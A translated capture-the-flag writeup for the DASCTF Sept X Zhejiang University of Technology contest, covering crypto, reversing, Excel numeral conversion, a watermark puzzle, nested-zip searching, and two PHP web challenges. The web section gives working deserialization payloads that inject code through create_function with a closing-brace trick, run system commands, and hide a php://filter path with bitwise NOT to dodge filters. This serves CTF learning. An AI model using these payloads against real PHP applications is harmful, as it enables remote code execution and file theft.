DASCTF Sept X Zhejiang University of Technology Autumn Challenge: partial writeups


Got completely carried through the whole competition by master 神光, wuhu~

His blog: m1n9yu3


Sign-in

An original problem from the Wangding Cup (Qinglong group)

https://tieba.baidu.com/p/6671953167

sagemath

m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
c = 21572244511100216966799370397791432119463715616349800194229377843045443048821
n = 2**256

# c == m^e (mod n); Sage's discrete_log(a, base) returns the exponent e with base^e == a
e = discrete_log(c, mod(m, n))

print(e)

e = 34852863801130149185238904762083023615101
Converted to bytes, e reads b'flag{DASCTF_zjut}'.
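The same discrete logarithm without Sage, as an added example that is not part of the original writeup: the group of units modulo 2^256 has order 2^255, so inside the cyclic subgroup generated by m the exponent can be peeled off one bit at a time (Pohlig-Hellman for a prime-power order) using nothing but Python's built-in pow. M, C and N are the challenge constants above; the helper names are my own, and the check the example makes is a round trip with a constructed exponent built from the flag text.

```python
# Added example (not the writeup's code): recover e from c = m^e mod 2^256 in
# plain Python. Every odd m has order 2^t modulo 2^k (t <= k-2), so the
# discrete log in <m> splits into t independent one-bit decisions.

# Challenge constants as given in the writeup.
M = 73964803637492582853353338913523546944627084372081477892312545091623069227301
C = 21572244511100216966799370397791432119463715616349800194229377843045443048821
N = 2 ** 256


def order_2adic(m, n):
    """Return t such that the multiplicative order of m modulo n is 2**t
    (n must be a power of two and m odd)."""
    t, x = 0, m % n
    while x != 1:
        x = x * x % n
        t += 1
    return t


def dlog_pow2(c, m, n):
    """Solve m**e == c (mod n) for e, n a power of two, c in the subgroup <m>."""
    t = order_2adic(m, n)
    m_inv = pow(m, -1, n)
    e = 0
    for i in range(t):
        # Divide out the bits already known, then raise to 2^(t-1-i): the result
        # is 1 exactly when bit i of the still-unknown part of the exponent is 0.
        h = pow(c * pow(m_inv, e, n) % n, 1 << (t - 1 - i), n)
        if h != 1:
            e |= 1 << i
    if pow(m, e, n) != c:
        raise ValueError("c is not in the subgroup generated by m")
    return e


def int_to_bytes(v):
    """Big-endian byte string of a non-negative integer (like long_to_bytes)."""
    return v.to_bytes((v.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    # Constructed round trip: encrypt a known exponent with M, then recover it.
    e_known = int.from_bytes(b"flag{DASCTF_zjut}", "big")
    assert dlog_pow2(pow(M, e_known, N), M, N) == e_known
    # The challenge ciphertext itself.
    e = dlog_pow2(C, M, N)
    print(e)
    print(int_to_bytes(e))
```

The loop runs at most 254 times (m is 5 mod 8, so its order is 2^254), and each iteration is a single modular exponentiation, so the whole recovery takes well under a second.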

ea5ycpp

Just guessed it.

d = [0x68, 0x6F, 0x65, 0x6C, 0x81, 0x69, 0x7A, 0x3D, 0x3B, 0x79,
     0x6B, 0x73, 0x38, 0x39, 0x7B, 0x70, 0x7B, 0x48, 0x73, 0x7C,
     0x85, 0x47, 0x7C, 0x96]
# byte i was shifted up by 2 + i; undo the shift to get the flag characters
for i in range(len(d)):
    print(chr(d[i] - 2 - i), end='')

pig_brain_king


Clicked 1000 times, exhausting.

Just patch the spot that checks whether you succeeded,

then hammer 1 and Enter like mad.

easy_math

#!/usr/bin/python3
# -*- coding: utf-8 -*-

from z3 import *


s = Solver()

x = Int("x")
y = Int("y")
z = Int("z")
c = Int("c")

# the four constraints recovered from the binary
s.add(x - c == 107010778014077)
s.add(y - c == 379654844783)
s.add(z - c == 104686361407310)
s.add(c + z + y + x == 212351672173114)

print(s.check())   # sat
print(s.model())

Just solve the system with z3,

read the values off the model,

then concatenate them:

flag{he11o_F1boNacci!}
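The same system solved by hand, as an added example that is not the writeup's code: substituting x = a + c, y = b + c, z = d + c into the sum equation leaves 4c = S - a - b - d, so the four unknowns follow from one division, and the integer solutions decode as big-endian byte strings. The constants are the ones from the z3 script; the helper names and the pure-Python approach are my own.

```python
# Added example (not the writeup's code): solve the easy_math system without z3
# and decode the solutions as bytes.
from fractions import Fraction

# Constants from the writeup's z3 script.
A = 107010778014077    # x - c
B = 379654844783       # y - c
D = 104686361407310    # z - c
S = 212351672173114    # x + y + z + c


def solve(a, b, d, s):
    """Return (x, y, z, c) for x-c=a, y-c=b, z-c=d, x+y+z+c=s.

    Substituting the three differences into the sum gives 4c + a + b + d = s,
    so c = (s - a - b - d) / 4 and the rest follow by addition."""
    c = Fraction(s - a - b - d, 4)
    if c.denominator != 1:
        raise ValueError("no integer solution")
    c = int(c)
    return a + c, b + c, d + c, c


def int_to_bytes(v):
    """Big-endian byte string of a non-negative integer."""
    return v.to_bytes((v.bit_length() + 7) // 8, "big")


def flag_body():
    """Decode y, z, x in that order; c is exactly 2**36 and carries no text."""
    x, y, z, c = solve(A, B, D, S)
    assert c == 2 ** 36
    return (int_to_bytes(y) + int_to_bytes(z) + int_to_bytes(x)).decode()


if __name__ == "__main__":
    print(solve(A, B, D, S))
    print("flag{" + flag_body())
```

The order of the pieces (y, then z, then x) is something the solver cannot tell you; each piece decodes to readable ASCII on its own, so the arrangement is chosen by reading them.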

Girlfriend's account

Excel functions

Two formulas:

=SUM(ISNUMBER(SEARCH(TEXT({1,2,3,4,5,6,7,8,9},"[dbnum2]"&{"0亿";"0仟!*万";"0佰!*万";"0拾!*万";"0万";"万!*0仟";"万!*0佰";"万!*0拾";"0元";"0角";"0分"}),IF(ISERR(FIND("万",A2)),"万",)&A2))*{1,2,3,4,5,6,7,8,9}*10^{8;7;6;5;4;3;2;1;0;-1;-2})

=IF(B3="壹",1,IF(B3="贰",2,IF(B3="叁",3,IF(B3="肆",4,IF(B3="伍",5,IF(B3="陆",6,IF(B3="柒",7,IF(B3="捌",8,IF(B3="玖",9)))))))))

flag{12305926.36}


Excel macro (VBA)

Noting down the VBA that pulls Arabic digits out of Chinese capital amounts in Excel; the script comes from the ExcelHome forum thread 中文大小写数字转阿拉伯数字-Excel VBA程序开发-ExcelHome技术论坛 (Chinese numerals to Arabic digits, Excel VBA development board).

This script cannot handle an amount like 一百零肆角肆分: the 零 has to be dropped to get 一百肆角肆分, so simply replace every 零 in the sheet with an empty string first.

Public Function CNToNum(sDBNum)
'=============================
'Chinese numerals (formal and everyday forms) to Arabic digits
'Converts a Chinese-capital RMB amount to an Arabic number
'by mzbao
'=============================
    Dim sCNnum$, sCNExp$, ExpArr, temp, i%, sChar$, NumChar$, sDBTxt$
    Dim m%, n%, rNum%, d%
    Dim LastExp%, Exp%, sFlag$, HasExp As Boolean

    sCNnum = "〇零一二三四五六七八九壹贰叁肆伍陆柒捌玖00123456789123456789"
    sCNExp = ",十,百,千,万,亿,兆,拾,佰,仟,萬,1,2,3,4,8,12,1,2,3,4"
    ExpArr = Split(sCNExp, ",")

    For i = 1 To 3
        sDBNum = Replace(sDBNum, Mid("整角分", i, 1), "")
        sDBNum = Replace(sDBNum, Mid("点元圆", i, 1), ".")
        sDBNum = Replace(sDBNum, Mid("○", i, 1), "零")
    Next i

    sDBTxt = sDBNum
    For i = Len(sDBTxt) To 1 Step -1
        sChar = Mid(sDBTxt, i, 1)
        m = InStr(sCNnum, sChar)
        If m > 0 Then
            If rNum = 0 Then rNum = i
            If m <= 20 Then
                NumChar = Mid(sCNnum, m + 20, 1)
            Else
                NumChar = sChar
            End If
            If HasExp = False Then
                temp = NumChar & temp
            Else
                temp = NumChar & Mid(temp, 2)
                If NumChar = 0 Then temp = 1 & Mid(temp, 2)
            End If
            HasExp = False
            If Exp > LastExp Then LastExp = 0
        Else
            n = InStr(sCNExp, sChar)
            If n > 0 Then
                Exp = ExpArr(n / 2 + 10)
                If InStr(",4,8,12,", "," & Exp & ",") Then
                    If LastExp >= Exp Then
                        LastExp = LastExp + Exp: Exp = 0
                    Else
                        LastExp = Exp: Exp = 0
                    End If
                End If
                sFlag = String(Exp + LastExp + 1 + d, "0")
                temp = Format(1 * temp, sFlag)
                HasExp = True
            End If
            If sChar = "." Then
                If i < rNum Then d = rNum - i
            End If
        End If
    Next
    If Left(temp, 1) = "0" And Len(temp) > 1 And Len(temp) > d + 1 Then temp = 1 & Mid(temp, 2)

    CNToNum = 1 * temp / 10 ^ d
End Function

python

Script source: 大写金额转小写(千万以下) (capital amount to digits, below ten million)

def hantonum(str1):
    # Everyday numerals only (一二三...), amounts below ten million: each digit is
    # multiplied by the unit that follows it, and the running total is scaled on 万.
    dict1 = {'一': 1, '二': 2, '三': 3, '四': 4, '五': 5, '六': 6, '七': 7, '八': 8, '九': 9}
    dict2 = {'十': 10, '百': 100, '千': 1000, '万': 10000, '元': 1, '角': 0.1, '分': 0.01}
    result = 0
    for index,i in enumerate(str1):
        if index<len(str1)-1:
            if (i in dict1 and str1[index+1] in dict2) or (i in dict2 and str1[index+1]=='万'):
                if str1[index+1] !='万':
                    result += dict1[i] * dict2[str1[index+1]]
                elif i in dict2:
                    result *=10000
                else:
                    result += dict1[i]
                    result *= 10000
    return result

print(hantonum('一千九百八十五万八千六百二十九元三角二分'))
print(hantonum('一千九百三十万八千六百二十八元三角二分'))
print(hantonum('一千九百零三万八千六百二十九元整'))
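One converter covering both the VBA macro above and this Python script, as an added example that is not from the writeup or from either forum source: it accepts the formal numerals (壹贰叁) the challenge uses as well as the everyday ones (一二三), tolerates 零, handles 角/分 that follow no 元 (the case the VBA script cannot), supports 亿, and accumulates in Decimal so the cents survive exactly. The inputs in the test are the three strings from the script above, the author's problem case, and a constructed capital-form amount equal to the challenge flag value; the function and helper names are my own.

```python
# Added example (not the writeup's code): Chinese amount-in-words -> Decimal.
from decimal import Decimal

# Both numeral sets map onto the same digit value.
DIGITS = {ch: value
          for value, chars in enumerate(["〇零○", "一壹", "二贰貳两兩", "三叁", "四肆",
                                         "五伍", "六陆陸", "七柒", "八捌", "九玖"])
          for ch in chars}
SMALL_UNITS = {"十": 10, "拾": 10, "百": 100, "佰": 100, "千": 1000, "仟": 1000}
SECTION_UNITS = {"万": 10 ** 4, "萬": 10 ** 4, "亿": 10 ** 8, "億": 10 ** 8}
YUAN = "元圆圓"
FRACTION_UNITS = {"角": Decimal("0.1"), "分": Decimal("0.01")}
IGNORED = "整正 "


def cn_amount_to_number(text):
    """Convert e.g. '壹仟贰佰叁拾万伍仟玖佰贰拾陆元叁角陆分' to Decimal('12305926.36')."""
    total = 0          # completed 万/亿 sections
    section = 0        # value accumulated below the next 万/亿
    num = 0            # the digit waiting for its unit
    int_part = None    # set once the integer part is closed by 元 or by 角/分
    frac = Decimal(0)

    def finish_integer(include_num):
        return total + section + (num if include_num else 0)

    for ch in text:
        if ch in DIGITS:
            num = DIGITS[ch]
        elif ch in SMALL_UNITS:
            section += (num or 1) * SMALL_UNITS[ch]      # a bare 十 means 10
            num = 0
        elif ch in SECTION_UNITS:
            unit = SECTION_UNITS[ch]
            if unit == 10 ** 8:
                total = (total + section + num) * unit   # everything before 亿 is its multiplier
            else:
                total += (section + num) * unit          # 万 closes one section
            section = num = 0
        elif ch in YUAN:
            if int_part is not None:
                raise ValueError("more than one 元")
            int_part = finish_integer(True)
            section = num = 0
        elif ch in FRACTION_UNITS:
            if int_part is None:
                # No 元 was written ('一百零肆角肆分'): the pending digit belongs to 角/分,
                # everything else is the integer part.
                int_part = finish_integer(False)
                section = 0
            frac += num * FRACTION_UNITS[ch]
            num = 0
        elif ch in IGNORED:
            continue
        else:
            raise ValueError(f"unexpected character {ch!r}")

    if int_part is None:           # no 元 and no 角/分 at all: a plain number
        int_part = finish_integer(True)
    return Decimal(int_part) + frac


if __name__ == "__main__":
    for s in ["一千九百八十五万八千六百二十九元三角二分",
              "壹仟贰佰叁拾万伍仟玖佰贰拾陆元叁角陆分",   # constructed: equals the flag value
              "一百零肆角肆分"]:
        print(s, "->", cn_amount_to_number(s))
```

Unknown characters raise instead of being skipped, so a sheet containing a numeral variant not in the tables fails loudly rather than silently producing a wrong amount.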

双目失明,身残志坚 (blind in both eyes, unbroken in spirit)

Extract the blind watermark, then look the symbols up in a pinyin braille chart:

zh e j iang g ong ie d a x ue

flag{zhejianggongyedaxue}

ZipBomb

import os
import zipfile

dir_path = 'C:\\Users\\Snowywar\\Desktop\\zipBomb'
files = os.listdir(dir_path)
newfiles = files[::-1]                  # walk the archives in reverse listing order
print(newfiles)
for file in newfiles:                   # iterate over the folder
    position = os.path.join(dir_path, file)   # absolute path of this archive
    print(position)
    with zipfile.ZipFile(position, 'r') as z:
        for filename in z.namelist():
            data = z.read(filename)
            if b'Zmxh' in data:         # base64 of "fla": a base64-encoded flag
                print(filename)

flag{F!nD_Fl4g_1n_2IP_13OMB}
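A recursive version of the search, as an added example that is not the writeup's code: instead of reading a folder of already-extracted archives it opens each archive found inside another one in memory, and, since the challenge is named after zip bombs, it checks depth, total decompressed size and per-member compression ratio before decompressing anything, so a genuinely malicious archive is rejected rather than exhausting memory or disk. The sample archives are constructed inline; the limit values and the helper names are my own choices.

```python
# Added example (not the writeup's code): bounded recursive search through
# nested zip archives for base64-encoded flag text.
import base64
import io
import zipfile

MAX_DEPTH = 32                      # nesting levels
MAX_TOTAL_BYTES = 64 * 1024 * 1024  # decompressed bytes across the whole walk
MAX_RATIO = 100                     # decompressed / compressed size per member


class ZipLimitExceeded(Exception):
    """Raised when an archive looks like a bomb rather than a puzzle."""


def walk_zip(data, needle, depth=0, budget=None, prefix=""):
    """Return [(path, content)] for every non-zip member whose bytes contain needle."""
    if budget is None:
        budget = [MAX_TOTAL_BYTES]
    if depth > MAX_DEPTH:
        raise ZipLimitExceeded(f"nesting deeper than {MAX_DEPTH}")
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            # Judge the declared sizes before decompressing anything.
            if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
                raise ZipLimitExceeded(f"{path}: ratio {info.file_size // info.compress_size}:1")
            budget[0] -= info.file_size
            if budget[0] < 0:
                raise ZipLimitExceeded("decompressed size budget exhausted")
            # Read one byte more than declared so a lying header is caught too.
            with z.open(info) as f:
                content = f.read(info.file_size + 1)
            if len(content) > info.file_size:
                raise ZipLimitExceeded(f"{path}: member larger than declared")
            if zipfile.is_zipfile(io.BytesIO(content)):
                hits += walk_zip(content, needle, depth + 1, budget, path + "/")
            elif needle in content:
                hits.append((path, content))
    return hits


def find_base64_flags(data, prefix=b"fla"):
    """Search for the base64 form of prefix (b'fla' -> b'Zmxh', valid only when the
    text starts on a 3-byte boundary) and return the decoded hits."""
    needle = base64.b64encode(prefix)
    out = []
    for path, content in walk_zip(data, needle):
        try:
            out.append((path, base64.b64decode(content, validate=True)))
        except ValueError:          # binascii.Error: not really base64
            continue
    return out


def build_nested_zip(levels, payload, inner_name="secret.txt"):
    """Constructed sample: payload wrapped in `levels` zips, each with a decoy file."""
    data, name = payload, inner_name
    for i in range(levels):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
            z.writestr(name, data)
            z.writestr(f"decoy{i}.txt", b"nothing to see here")
        data, name = buf.getvalue(), f"level{i}.zip"
    return data


def build_bomb_like_zip(size=2 * 1024 * 1024):
    """Constructed sample: one highly compressible member, the mark of a zip bomb."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("zeros.bin", b"\0" * size)
    return buf.getvalue()


def is_rejected(data):
    """True if the limits stop the walk before it finishes."""
    try:
        walk_zip(data, b"Zmxh")
        return False
    except ZipLimitExceeded:
        return True


SAMPLE_FLAG = b"flag{constructed_sample}"                        # constructed
SAMPLE_ARCHIVE = build_nested_zip(3, base64.b64encode(SAMPLE_FLAG))

if __name__ == "__main__":
    print(find_base64_flags(SAMPLE_ARCHIVE))
    print("bomb-like archive rejected:", is_rejected(build_bomb_like_zip()))
```

The ratio test is done on the central-directory sizes, so a member is refused before a single byte of it is inflated; the extra-byte read after that guards against headers that understate the member size.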

hellounser

This closing-brace trick is worth remembering; it works in many situations. Payload:

<?php
/**
 * @Author: ying
 * @Date:   2021-09-25 13:41:23
 * @Last Modified by:   ying
 * @Last Modified time: 2021-09-25 20:42:24
 */
class A {
    public $var;
    public function __construct(){
        $this->var = new B();
    }
}
class B{
    public $func;
    public $arg;
    public function __construct(){
        $this->func = "create_function";
        // $this->arg = "}var_dump(get_defined_vars());//";
        $this->arg = "}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//";
    }
}
echo urlencode(serialize(new A()));

Fires in one shot.

F2

Bitwise NOT is also a common trick; I referred to BUUCTF-日刷-DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser/反序列化-正则过滤 (a daily-BUUCTF writeup of this hellounser deserialization / regex-filter challenge).

First, the same closing trick is needed; then just run the command directly (the argument inside system() is recognised even without quotes; why? If you ask, it is a PHP quirk. I forget where I saw it; maybe I'll run into it again, hhh):

$this->func = "create_function";
$this->arg = "return(1);}system(ls);//";

But flag, *, ? and the like are filtered, so the file cannot be read directly; consider bitwise NOT (too lazy to write it myself, so I just took the master's script):

$ac=(~('php://filter/read=convert.base64-encode/resource=Tru3flag.php'));
$at='return(1);}require(~('.strval($ac).'));//';
$a = new A;
$b = new B;
$b->func="create_function";
$b->arg=$at;
$a->var=$b;
$ser = serialize($a);
//echo $ser;
echo urlencode($ser);

Author: yq1ng
Copyright notice: unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit yq1ng when reposting!